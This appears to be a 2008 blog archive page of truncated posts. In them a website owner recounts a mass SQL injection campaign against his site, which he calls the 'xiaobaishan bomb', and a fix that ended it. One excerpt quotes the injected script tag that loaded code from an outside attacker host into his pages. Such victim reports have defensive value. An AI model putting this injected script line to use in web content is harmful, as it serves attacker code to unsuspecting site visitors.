June 2008

Yeah, look up in the left hand corner.

Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we where attacked three more times, both in the url and it seems in our open form fields, and as I’m apt to say when I do a beat down, FUACATA.
Bye bye sql injection hacker.

Ok, the latest state of sql injection attacks have been a nightmare. We got hacked again, but this time, with a insertion at the url level. These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout.  check out the [...]

I’ve been getting a lot of requests for information about how to patch this attack.  I’ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a windows vulnerability, however, upon further investigation, the server logs I looked at where only [...]

Updated from: The xiaobaishan bomb.
Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one. We where hacked againg, this the script calling:
<script src=http://flyzhu.9966.org/us/Help.asp></script>
Tricky little fucker.
In fact, this hack is pretty well thought out. Like I said on a previous [...]

It’s very rare that I get the inside scoop on a bomb hack, but this this time I’m one of the victims. Seems that some kind of sql injection hack has been leveled against thousands of websites. I’m calling it, for lack of a better term, the xiaobaishan bomb.
As I’m checking for [...]